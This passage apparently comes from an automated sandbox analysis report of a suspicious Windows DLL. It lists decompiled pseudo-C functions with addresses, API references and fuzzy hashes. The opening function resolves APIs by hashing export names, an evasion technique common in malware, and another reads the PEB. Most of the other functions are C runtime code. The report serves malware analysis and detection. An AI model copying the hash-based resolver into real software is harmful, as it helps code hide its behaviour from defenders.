									_t66 =  *_t88 & 0x0000ffff;
									_t90 = _t66;
								} while (_t66 != 0);
								_t51 = _v12;
								_t70 = _v8;
							}
							if(_t81 == _v20) {
								_t82 = _v16;
								_t89 = 0;
								if(_t82 != 0) {
									do {
										_t92 =  *_t51 + _t70;
										_v12 = _t51 + 4;
										_t53 = 0;
										_t68 =  *_t92;
										if(_t68 != 0) {
											do {
												_t84 = _t68 + 0x00000020 & 0x000000ff;
												_t92 = _t92 + 1;
												_t74 = _t68 & 0x000000ff;
												_t68 =  *_t92;
												_t85 =  >=  ? _t74 : _t84;
												_t75 =  >=  ? _t74 : _t84;
												_t53 = _t53 * 0x00000101 + ( >=  ? _t74 : _t84) ^ ( >=  ? _t74 : _t84) << 0x00000010;
											} while (_t68 != 0);
											_t70 = _v8;
											_t82 = _v16;
										}
										if(_t53 == _v24) {
											return  *((intOrPtr*)( *((intOrPtr*)(_v32 + 0x1c)) + ( *( *((intOrPtr*)(_v32 + 0x24)) + _t89 * 2 + _t70) & 0x0000ffff) * 4 + _v8)) + _v8;
										} else {
											goto L13;
										}
										goto L18;
										L13:
										_t51 = _v12;
										_t89 = _t89 + 1;
									} while (_t89 < _t82);
									_t67 = _v28;
								}
							}
						}
						goto L15;
						L15:
						_t70 =  *((intOrPtr*)(_t67 + 0x18));
						_v8 = _t70;
					} while (_t70 != 0);
					goto L16;
				}
				L18:
			}

0x6ea528dd
0x6ea528e5
0x6ea528e8
0x6ea528eb
0x6ea528ee
0x6ea528f3
0x6ea529dc
0x6ea529e4
0x6ea52900
0x6ea52900
0x6ea52903
0x6ea52906
0x6ea52908
0x6ea5290b
0x6ea52911
0x6ea52917
0x6ea5291a
0x6ea52920
0x6ea52926
0x6ea52929
0x6ea5292b
0x6ea5292d
0x6ea52933
0x6ea52935
0x6ea52935
0x6ea5293f
0x6ea52945
0x6ea5294e
0x6ea52956
0x6ea52958
0x6ea5295b
0x6ea5295d
0x6ea52962
0x6ea52965
0x6ea52965
0x6ea5296b
0x6ea5296d
0x6ea52970
0x6ea52974
0x6ea52976
0x6ea5297b
0x6ea5297d
0x6ea52980
0x6ea52982
0x6ea52986
0x6ea52990
0x6ea52996
0x6ea52999
0x6ea5299c
0x6ea5299f
0x6ea529a1
0x6ea529aa
0x6ea529b2
0x6ea529b4
0x6ea529b8
0x6ea529bb
0x6ea529bb
0x6ea529c1
0x6ea52a06
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea529c3
0x6ea529c3
0x6ea529c6
0x6ea529c7
0x6ea529cb
0x6ea529cb
0x6ea52974
0x6ea5296b
0x00000000
0x6ea529ce
0x6ea529ce
0x6ea529d1
0x6ea529d4
0x00000000
0x6ea52900
0x00000000

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ec9c83119875facca7ea43f8b2af49efdd29c7f4825bbfbf1e15f0a9a40edc
Instruction ID: bc8f0ce6184db342948e73c0b1c9ff55d230757c05aaee6c757b1d5654d4b416
Opcode Fuzzy Hash: 92ec9c83119875facca7ea43f8b2af49efdd29c7f4825bbfbf1e15f0a9a40edc
Instruction Fuzzy Hash: 3E419D76B00116CFDB48CF99C490AA9B7F1FF89310B1985AED895AB345D730ED91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EA56AEE, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EA56AEE(void* __ecx) {
				char _v8;
				void* __esi;
				intOrPtr _t7;
				char _t13;

				_push(__ecx);
				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6EA57E38(__ecx, 0, _t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6ea56af3
0x6ea56afb
0x6ea56afd
0x6ea56b00
0x6ea56b03
0x6ea56b06
0x6ea56b17
0x6ea56b19
0x6ea56b08
0x6ea56b0c
0x6ea56b15
0x00000000
0x00000000
0x6ea56b15
0x6ea56b20

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361d8cae86cc88c3f6ece109b2747686eb4c3269020cc8dce00f7aa58c866e7a
Instruction ID: 98dcfac755cfe99b9e25861b320d9de2eac9b7181adff5ced626050835208b15
Opcode Fuzzy Hash: 361d8cae86cc88c3f6ece109b2747686eb4c3269020cc8dce00f7aa58c866e7a
Instruction Fuzzy Hash: B4E04672A62228EB8710CAC89A0099AB3ACEB49B10F1645AAF904D3300C670EE50C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA58F44, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA58F44(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6ea936f0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6EA56E13(_t46);
							E6EA5AB1B( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6EA56E13(_t47);
							E6EA5AC19( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6EA56E13( *((intOrPtr*)(_t74 + 0x7c)));
						E6EA56E13( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6EA56E13( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6EA56E13( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6EA56E13( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6EA56E13( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6EA590B7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6ea93630) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6EA56E13(_t31);
							E6EA56E13( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe7b
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6EA56E13(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6EA56E13(_t74);
			}

0x6ea58f4c
0x6ea58f50
0x6ea58f58
0x6ea58f61
0x6ea58f66
0x6ea58f6d
0x6ea58f75
0x6ea58f7d
0x6ea58f88
0x6ea58f8e
0x6ea58f8f
0x6ea58f97
0x6ea58f9f
0x6ea58faa
0x6ea58fb0
0x6ea58fb4
0x6ea58fbf
0x6ea58fc5
0x6ea58f66
0x6ea58fc6
0x6ea58fce
0x6ea58fe1
0x6ea58ff4
0x6ea59002
0x6ea5900d
0x6ea59012
0x6ea5901b
0x6ea59023
0x6ea59024
0x6ea5902a
0x6ea5902d
0x6ea59030
0x6ea59037
0x6ea59039
0x6ea5903d
0x6ea59045
0x6ea5904c
0x6ea59052
0x6ea59053
0x6ea59053
0x6ea5905a
0x6ea5905c
0x6ea5905c
0x6ea59061
0x6ea59069
0x6ea5906e
0x6ea5906f
0x6ea5906f
0x6ea59072
0x6ea59075
0x6ea59078
0x6ea5907b
0x6ea5907b
0x6ea5908d

APIs

___free_lconv_mon.LIBCMT ref: 6EA58F88

Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB38
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB4A
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB5C
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB6E
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB80
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB92
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABA4
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABB6
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABC8
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABDA
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABEC
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABFE
Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AC10

_free.LIBCMT ref: 6EA58F7D

Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B

_free.LIBCMT ref: 6EA58F9F
_free.LIBCMT ref: 6EA58FB4
_free.LIBCMT ref: 6EA58FBF
_free.LIBCMT ref: 6EA58FE1
_free.LIBCMT ref: 6EA58FF4
_free.LIBCMT ref: 6EA59002
_free.LIBCMT ref: 6EA5900D
_free.LIBCMT ref: 6EA59045
_free.LIBCMT ref: 6EA5904C
_free.LIBCMT ref: 6EA59069
_free.LIBCMT ref: 6EA59081

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 31102c1d5f0fccab00bded20b3953ebc524a099c139fc33ae5344c71d8750c79
Instruction ID: cee99080f5213e526db3bc3ae4a7ad01a9810f3a3bd33c5f339a79a4ab4ae761
Opcode Fuzzy Hash: 31102c1d5f0fccab00bded20b3953ebc524a099c139fc33ae5344c71d8750c79
Instruction Fuzzy Hash: 2D319071A143019FEB609AB4DA00B9A73E9EF40314F244C6DE468DB390DF35ADF49B18

Uniqueness

Uniqueness Score: -1.00%

Function 6EA566C1, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6EA566C1(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x6ea5ea28;
				if(_t67 != 0x6ea5ea28) {
					E6EA56E13(_t67);
					_t36 = _a4;
				}
				E6EA56E13( *((intOrPtr*)(_t36 + 0x3c)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x30)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x34)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x38)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x28)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x2c)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x40)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x44)));
				E6EA56E13( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6EA56509(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6EA5656A(_t71, _t75);
			}

0x6ea566c1
0x6ea566c6
0x6ea566cc
0x6ea566ce
0x6ea566d4
0x6ea566d7
0x6ea566dc
0x6ea566df
0x6ea566e3
0x6ea566ee
0x6ea566f9
0x6ea56704
0x6ea5670f
0x6ea5671a
0x6ea56725
0x6ea56730
0x6ea5673e
0x6ea56749
0x6ea56751
0x6ea56752
0x6ea56755
0x6ea5675b
0x6ea5675f
0x6ea56763
0x6ea56764
0x6ea5676e
0x6ea56774
0x6ea56775
0x6ea56778
0x6ea5677e
0x6ea56782
0x6ea56786
0x6ea5678f

APIs

_free.LIBCMT ref: 6EA566D7

Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B

_free.LIBCMT ref: 6EA566E3
_free.LIBCMT ref: 6EA566EE
_free.LIBCMT ref: 6EA566F9
_free.LIBCMT ref: 6EA56704
_free.LIBCMT ref: 6EA5670F
_free.LIBCMT ref: 6EA5671A
_free.LIBCMT ref: 6EA56725
_free.LIBCMT ref: 6EA56730
_free.LIBCMT ref: 6EA5673E

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e52dbfc21cf87756d78d3f2752028d213206b3bb7014b8c8c108d0039aa2fba
Instruction ID: ebc30eb349649671a4a409c4a7eec3cd1a4467783a038a83503868cb0a331767
Opcode Fuzzy Hash: 5e52dbfc21cf87756d78d3f2752028d213206b3bb7014b8c8c108d0039aa2fba
Instruction Fuzzy Hash: 9A21F776D10108AFCB01DFD4C980DDE7BB8AF48300F1049A6F9049B320DB75EAA49B84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5A0F4, Relevance: 10.7, APIs: 7, Instructions: 162
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E6EA5A0F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				signed char* _v36;
				long _v40;
				intOrPtr _v44;
				signed char* _v48;
				void* _v52;
				signed int _v56;
				int _v60;
				long _v64;
				signed int _t81;
				signed int _t83;
				int _t89;
				signed char* _t91;
				void* _t99;
				signed char* _t100;
				long _t104;
				void _t112;
				void* _t121;
				signed int _t126;
				signed int _t128;
				signed char _t132;
				signed char _t138;
				intOrPtr _t139;
				signed int _t141;
				signed char* _t143;
				intOrPtr* _t145;
				signed int _t146;
				void* _t147;

				_t81 =  *0x6ea93004; // 0x90a7628e
				_v8 = _t81 ^ _t146;
				_t83 = _a8;
				_t128 = _t83 >> 6;
				_t126 = (_t83 & 0x0000003f) * 0x30;
				_t143 = _a12;
				_v48 = _t143;
				_v56 = _t128;
				_v52 =  *((intOrPtr*)( *((intOrPtr*)(0x6ea93f20 + _t128 * 4)) + _t126 + 0x18));
				_v44 = _a16 + _t143;
				_t89 = GetConsoleCP();
				_t145 = _a4;
				_v60 = _t89;
				 *_t145 = 0;
				 *((intOrPtr*)(_t145 + 4)) = 0;
				 *((intOrPtr*)(_t145 + 8)) = 0;
				_t91 = _t143;
				if(_t91 < _v44) {
					_v36 =  &(_t91[1]);
					do {
						_v28 = 0;
						_v31 =  *_t143;
						_t139 =  *((intOrPtr*)(0x6ea93f20 + _v56 * 4));
						_t132 =  *(_t139 + _t126 + 0x2d);
						if((_t132 & 0x00000004) == 0) {
							if( *((intOrPtr*)(E6EA58EA1(_t126, _t139) + ( *_t143 & 0x000000ff) * 2)) >= 0) {
								_push(1);
								_push(_t143);
								goto L9;
							} else {
								if(_v36 >= _v44) {
									_t141 = _v56;
									 *((char*)( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2e)) =  *_t143;
									 *( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2d) =  *( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2d) | 0x00000004;
									 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
								} else {
									_t121 = E6EA58D6F( &_v28, _t143, 2);
									_t147 = _t147 + 0xc;
									if(_t121 != 0xffffffff) {
										_t143 =  &(_t143[1]);
										_t100 =  &(_v36[1]);
										goto L11;
									}
								}
							}
						} else {
							_t138 = _t132 & 0x000000fb;
							_v16 =  *((intOrPtr*)(_t139 + _t126 + 0x2e));
							_push(2);
							_v15 = _t138;
							 *(_t139 + _t126 + 0x2d) = _t138;
							_push( &_v16);
							L9:
							_push( &_v28);
							_t99 = E6EA58D6F();
							_t147 = _t147 + 0xc;
							if(_t99 != 0xffffffff) {
								_t100 = _v36;
								L11:
								_t143 =  &(_t143[1]);
								_v36 =  &(_t100[1]);
								_t104 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
								_v64 = _t104;
								if(_t104 != 0) {
									if(WriteFile(_v52,  &_v24, _t104,  &_v40, 0) == 0) {
										L21:
										 *_t145 = GetLastError();
									} else {
										 *((intOrPtr*)(_t145 + 4)) = _t143 - _v48 +  *((intOrPtr*)(_t145 + 8));
										if(_v40 >= _v64) {
											if(_v31 != 0xa) {
												goto L18;
											} else {
												_t112 = 0xd;
												_v32 = _t112;
												if(WriteFile(_v52,  &_v32, 1,  &_v40, 0) == 0) {
													goto L21;
												} else {
													if(_v40 >= 1) {
														 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;
														 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
														goto L18;
													}
												}
											}
										}
									}
								}
							}
						}
						goto L22;
						L18:
					} while (_t143 < _v44);
				}
				L22:
				return E6EA53252(_v8 ^ _t146);
			}

0x6ea5a0fc
0x6ea5a103
0x6ea5a106
0x6ea5a10e
0x6ea5a112
0x6ea5a11e
0x6ea5a121
0x6ea5a124
0x6ea5a12b
0x6ea5a133
0x6ea5a136
0x6ea5a13c
0x6ea5a13f
0x6ea5a144
0x6ea5a146
0x6ea5a149
0x6ea5a14c
0x6ea5a151
0x6ea5a158
0x6ea5a15b
0x6ea5a15f
0x6ea5a166
0x6ea5a169
0x6ea5a170
0x6ea5a177
0x6ea5a1a0
0x6ea5a1cd
0x6ea5a1cf
0x00000000
0x6ea5a1a2
0x6ea5a1a8
0x6ea5a27c
0x6ea5a288
0x6ea5a293
0x6ea5a298
0x6ea5a1ae
0x6ea5a1b5
0x6ea5a1ba
0x6ea5a1c0
0x6ea5a1c9
0x6ea5a1ca
0x00000000
0x6ea5a1ca
0x6ea5a1c0
0x6ea5a1a8
0x6ea5a179
0x6ea5a17d
0x6ea5a180
0x6ea5a186
0x6ea5a188
0x6ea5a18b
0x6ea5a18f
0x6ea5a1d0
0x6ea5a1d3
0x6ea5a1d4
0x6ea5a1d9
0x6ea5a1df
0x6ea5a1e5
0x6ea5a1e8
0x6ea5a1ea
0x6ea5a1f0
0x6ea5a201
0x6ea5a207
0x6ea5a20c
0x6ea5a229
0x6ea5a29d
0x6ea5a2a3
0x6ea5a22b
0x6ea5a233
0x6ea5a23c
0x6ea5a242
0x00000000
0x6ea5a244
0x6ea5a246
0x6ea5a247
0x6ea5a263
0x00000000
0x6ea5a265
0x6ea5a269
0x6ea5a26b
0x6ea5a26e
0x00000000
0x6ea5a26e
0x6ea5a269
0x6ea5a263
0x6ea5a242
0x6ea5a23c
0x6ea5a229
0x6ea5a20c
0x6ea5a1df
0x00000000
0x6ea5a271
0x6ea5a271
0x6ea5a27a
0x6ea5a2a5
0x6ea5a2b7

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6EA5A880,00000008,00000001,00000020,0000002C,?), ref: 6EA5A136
__fassign.LIBCMT ref: 6EA5A1B5
__fassign.LIBCMT ref: 6EA5A1D4
WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6EA5A201
WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6EA5A880), ref: 6EA5A221
WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6EA5A880), ref: 6EA5A25B

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c90af5f1bcdfae3d3246d0ebec8d87bdb5bfd7ac7ef73a92b4dd21d44d05c6da
Instruction ID: 83354ae039f4a0a7ce6e0ef9b40d13ed968124f01418577c5de35acdb4c58892
Opcode Fuzzy Hash: c90af5f1bcdfae3d3246d0ebec8d87bdb5bfd7ac7ef73a92b4dd21d44d05c6da
Instruction Fuzzy Hash: D95180B1A102499FDB00CFE8C885AEEBBF9FF09310F14852AE556EB351D7309991CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA53E70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EA53E70(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t75;
				char _t77;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t110;

				_t71 = _a8;
				_v5 = 0;
				_t93 = _t71 + 0x10;
				_push(_t93);
				_v16 = 1;
				_v20 = _t93;
				_v12 =  *(_t71 + 8) ^  *0x6ea93004;
				E6EA53E30( *(_t71 + 8) ^  *0x6ea93004);
				E6EA54317(_a12);
				_t51 = _a4;
				_t102 = _t101 + 0xc;
				_t90 =  *((intOrPtr*)(_t71 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						E6EA54300(_t71, 0xfffffffe, _t93, 0x6ea93004);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t75 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
							_t59 = _t75 + _t58 * 4;
							_t76 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t77 = _v5;
								goto L8;
							} else {
								_t60 = E6EA542B0(_t76, _t93);
								_t77 = 1;
								_v5 = 1;
								_t110 = _t60;
								if(_t110 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									E6EA53E30(_v12);
									goto L15;
								} else {
									if(_t110 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6ea5ea20;
											if(__eflags != 0) {
												_t67 = E6EA5CCA0(__eflags, 0x6ea5ea20);
												_t102 = _t102 + 4;
												__eflags = _t67;
												if(_t67 != 0) {
													_t97 =  *0x6ea5ea20; // 0x6ea54f0c
													 *0x6ea5e104(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t102 = _t102 + 8;
												}
												_t61 = _a4;
											}
										}
										E6EA542E4(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											E6EA54300(_t63, _t90, _t93, 0x6ea93004);
											_t63 = _a8;
										}
										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
										_t64 = E6EA53E30(_v12);
										E6EA542C8();
										asm("int3");
										__imp__InterlockedFlushSList(_v32, _t98, _t93);
										__eflags = _t64;
										if(_t64 != 0) {
											_push(_t93);
											do {
												_t95 =  *_t64;
												E6EA562C6(_t64);
												_t64 = _t95;
												__eflags = _t95;
											} while (_t95 != 0);
											return _t64;
										}
										return _t64;
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t90 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t77 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}

0x6ea53e77
0x6ea53e7c
0x6ea53e83
0x6ea53e8c
0x6ea53e8e
0x6ea53e95
0x6ea53e98
0x6ea53e9b
0x6ea53ea3
0x6ea53ea8
0x6ea53eab
0x6ea53eae
0x6ea53eb5
0x6ea53f16
0x6ea53f19
0x6ea53f28
0x00000000
0x6ea53f28
0x00000000
0x6ea53eb7
0x6ea53eb7
0x6ea53ebd
0x6ea53ec3
0x6ea53ec9
0x6ea53f39
0x6ea53f42
0x6ea53ecb
0x6ea53ed0
0x6ea53ed0
0x6ea53ed3
0x6ea53ed6
0x6ea53ed9
0x6ea53edc
0x6ea53edf
0x6ea53ee2
0x6ea53ee7
0x6ea53efd
0x00000000
0x6ea53ee9
0x6ea53eeb
0x6ea53ef0
0x6ea53ef2
0x6ea53ef5
0x6ea53ef7
0x6ea53f0d
0x6ea53f2d
0x6ea53f2d
0x6ea53f31
0x00000000
0x6ea53ef9
0x6ea53ef9
0x6ea53f43
0x6ea53f46
0x6ea53f4c
0x6ea53f4e
0x6ea53f55
0x6ea53f5c
0x6ea53f61
0x6ea53f64
0x6ea53f66
0x6ea53f68
0x6ea53f75
0x6ea53f7b
0x6ea53f7d
0x6ea53f80
0x6ea53f80
0x6ea53f83
0x6ea53f83
0x6ea53f55
0x6ea53f8b
0x6ea53f90
0x6ea53f93
0x6ea53f96
0x6ea53fa2
0x6ea53fa7
0x6ea53fa7
0x6ea53fae
0x6ea53fb1
0x6ea53fc1
0x6ea53fc6
0x6ea53fcd
0x6ea53fd3
0x6ea53fd5
0x6ea53fd7
0x6ea53fd8
0x6ea53fd8
0x6ea53fdb
0x6ea53fe0
0x6ea53fe3
0x6ea53fe3
0x00000000
0x6ea53fe7
0x6ea53fe9
0x6ea53efb
0x00000000
0x6ea53efb
0x6ea53ef9
0x6ea53ef7
0x00000000
0x6ea53f00
0x6ea53f00
0x6ea53f02
0x6ea53f09
0x00000000
0x6ea53f0b
0x00000000
0x6ea53f09
0x6ea53ec9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6EA53E9B
___except_validate_context_record.LIBVCRUNTIME ref: 6EA53EA3
_ValidateLocalCookies.LIBCMT ref: 6EA53F31
__IsNonwritableInCurrentImage.LIBCMT ref: 6EA53F5C
_ValidateLocalCookies.LIBCMT ref: 6EA53FB1

Strings

csm, xrefs: 6EA53F46

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
